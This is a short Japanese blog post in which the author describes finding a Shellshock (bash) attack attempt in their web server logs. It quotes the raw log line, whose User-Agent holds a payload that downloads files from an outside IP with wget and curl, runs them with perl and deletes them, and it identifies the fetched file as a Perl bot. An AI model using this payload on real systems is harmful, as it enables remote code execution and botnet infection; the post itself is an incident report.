世間で騒がれてる bash脆弱性「Shellshock」
詳しいことは分からないけどbashが基で動いてる Linux は多いから OpenSSL脆弱のときよりやばいらしい
Twitter とか見ていても案外周りの人も普通に突かれてて親切に User-Agent に脆弱あるよ!ここのサイト見た方がいい!っていうものだったり
おれもきててもそんなもんだろうと思ってました。
違った
[source]
"GET /cgi-bin/hi HTTP/1.0" 403 212 "-" "() { :;}; /bin/bash -c \x22cd /tmp;wget http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/jurat ; perl /tmp/ji;rm –rf /tmp/ji;rm -rf /tmp/ji*\x22" "-"
[/source]
Shellshockを使って、wget でプログラムをダウンロードして、curl -O で/jurat を /tmp/ji に保存して、プログラムを実行して
/tmp/ji* を削除
http://213.5.67.223/ji にアクセスしてみるとPerlで書かれたプログラム「LinuxNet perlbot」がありました。
調べてみるとPerlを使ってCPUを100%にさせて機能不能にさせるというものだった。
ということで、TOPコマンドしてみた。
やった!使用率100%になった!
とりあえず bashのアップデートしようと思いますが怖いですね。
http://213.5.67.223/jurat ここは存在してなかったので curl -O は実行出来ませんでした。
参考:http://d.hatena.ne.jp/Kango/20140928/1411939683
参考:https://forum.linode.com/viewtopic.php?t=8169